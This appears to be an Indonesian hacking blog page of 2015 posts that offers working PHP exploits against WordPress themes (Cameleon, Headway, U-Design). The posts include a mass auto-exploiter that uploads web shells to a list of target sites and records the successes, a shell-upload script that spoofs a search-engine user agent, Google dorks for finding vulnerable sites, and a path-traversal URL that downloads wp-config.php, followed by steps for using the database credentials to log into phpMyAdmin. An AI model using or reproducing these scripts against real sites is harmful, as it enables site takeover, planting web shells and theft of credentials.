Tampilkan postingan dengan label PHP. Tampilkan semua postingan
Tampilkan postingan dengan label PHP. Tampilkan semua postingan

Senin, 07 Desember 2015

WordPress Chameleon Auto exploiter




#- Title : WordPress Chameleon Auto exploiter
#- Coded By : kkk1337
#- Team : Umbrella Security
#- Extension : Php
#- Using this Tool >> php file.php list.txt
#- Example >> file.php = This file name | list.txt = your list target


<?php 


// Coded by KkK1337

// Greetz to: Condor8

// fb: https://www.facebook.com/Cracker1337

// pastebin: http://pastebin.com/u/KkK1337

// don't change rights


echo "chameleon auto-exploiter by KkK1337";


$x=file($argv[1]);

foreach ($x as $sites){
$sites=trim($sites);
$uploadfile="credits.phtml"; 
$ch = curl_init("$sites/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php"); 
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
$waw = curl_exec($ch); 
curl_close($ch); 

if(preg_match("/success/i",$waw)){

print "shell uploaded : $sites \n"; 
$u="$sites/wp-content/uploads/2014/10/credits.phtml"; // Change year and month. Year: 2014 , Month: 10
$ux = "".$u."\r\n"; $save=fopen('new.txt','ab'); fwrite($save,"$ux");

}

else{

echo "Not vuln : $sites\n";

}

}


?>
Diposting oleh di Tidak ada komentar:
Label: , , ,

Selasa, 27 Oktober 2015

Wordpress Headway Themes Shell Upload Vulnerability



#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 
·         When Vulnerable /home/localhost/public_html/


Proof Of Concept :


Tools Coded by Mr.MaGnoM

<?php


/*
link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didnt make auto exploiter because theme headway dont have one name
for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/
so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than

write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php

shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site

that script on php for exploit site by site :/

to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/


$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
  echo "\nnot infected\n";
}

?>

Shell Acces ?  Here


Diposting oleh di Tidak ada komentar:
Label: , , ,

Rabu, 23 September 2015

Wordpress Themes U-Design Multiple Vulnerabilty




#-Title: Wordpress Themes U-Design Multiple Vulnerabilty
#-Author: Tn_Scorpion
#-Date: 18/01/2015
#- Vendor : Themeforest
#- by : andondesign
#- Link Download : themeforest.net/item/udesign-responsive-wordpress-theme/253220
#-Google Dork: inurl:wp-content/themes/u-design
#- Tested on : Windows 8
--------------------------------------------------------
Multiple Vulnerabilty

Kenapa ? karena themes ini mempunyai dua bug sebenernya, tapi yang tenar cuma File uplod vulnerabilitynya doang :'v sebenernya ada ada lagi yaitu Arbitrary File Download Vulnerability. ok cukup ~

Proof Of Concept :

--
File uplod vulnerability 
--

<?php

$uploadfile="3xploi7.php";

$ch = curl_init("http://3xploi7.id/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php");

curl_setopt($ch, CURLOPT_POST, true);

curl_setopt($ch, CURLOPT_POSTFIELDS,

              array('Filedata'=>"@$uploadfile",

              'folder'=>'/wp-content/themes/u-design/scripts/admin/uploadify/'));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);



  print "$postResult";

?>

Result : Here !
--
File Download Vulnerability
--

http://3xploi7.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

1. Download Confignya
2. Buka dan cari user pw dbnya
3. login di web.com/phpmyadmin
4. terserah anda.

Diposting oleh di Tidak ada komentar:
Label: , ,
Langganan: Postingan (Atom)